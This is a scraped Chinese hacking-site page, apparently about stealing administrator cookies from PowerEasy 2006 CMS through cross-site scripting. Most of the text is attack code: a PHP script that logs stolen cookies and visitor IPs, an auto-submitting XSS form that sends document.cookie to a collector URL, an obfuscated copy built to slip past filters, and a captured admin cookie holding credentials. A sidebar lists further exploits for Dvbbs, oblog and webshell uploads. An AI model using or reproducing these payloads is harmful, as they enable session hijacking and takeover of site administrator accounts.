| 以下是引用片段: <? $filename = date("Ymd").".txt"; $time = @date("Y年m月d号H点i分s秒",time()); $cookie = $_POST['cookie']; $url = $_POST['url']; $hostname = $_POST['hostname']; if ($cookie <> ""){ $tmp = fopen($filename,"a+"); fwrite($tmp,"地址:".$url."\n主机:".$hostname."\nCookie:".$cookie."\nIP:".$_SERVER['REMOTE_ADDR']."\n".$time."\n"); fclose($tmp); } ?> |
| 以下是引用片段: <form name=redir action=http://localhost/cookies/cookie.asp method=post> <input type=hidden name=cookie> <input type=hidden name=url> <input type=hidden name=hostname> </form> <script>redir.cookie.value=document.cookie;redir.url.value=location.href;redir.hostname.value=location.hostname;redir.submit();</script> |
| 以下是引用片段: <FOSCRIPTRM naSCRIPTme=redSCRIPTir actSCRIPTion=http://locaSCRIPTlhost/cooSCRIPTkies/cooSCRIPTkie.asp> <input type=hidSCRIPTden name=coSCRIPTokie> <input type=hidSCRIPTden name=uSCRIPTrl> <input type=hidSCRIPTden name=hoSCRIPTstname> </forSCRIPTm> <scrSCRIPTipt>rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit();</scrSCRIPTipt> |
| 以下是引用片段: ASPSESSIONIDQCRQQSAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=4P263W7JiD425kyd&UserName=admin&AdminLoginCode=PowerEasy2006&AdminName=admin&UserPassword=469e80d32c0559f8&RndPassword=4P263W7JiD425kyd&AdminPassword=469e80d32c0559f8 |
| 动易2006_SP6最新漏洞得到管理员 | 08-20 | |
| Dvbbs8严重漏洞 | 08-11 | |
| oblog商业版本4.6注射漏洞,直接 | 08-11 | |
| dvbbs8.0 access 后台拿webshell | 08-11 | |
| 百度博客挂马 | 08-06 | |
| 无<>跨站一例——kevin blog跨站 | 08-03 | |
| 网易博客的60余个事件触发式漏洞 | 07-26 | |
| joekoe CMS 4.0 两个漏洞(上传漏 | 07-26 | |
| XSS Phishing - 新式跨站脚本攻击 | 07-26 | |
| 浅析XSS(Cross Site Script)漏洞 | 07-26 | |
| BBSXP 2007的漏洞利用演示 | 07-11 | |
| 动网8.0最新漏洞 | 07-11 | |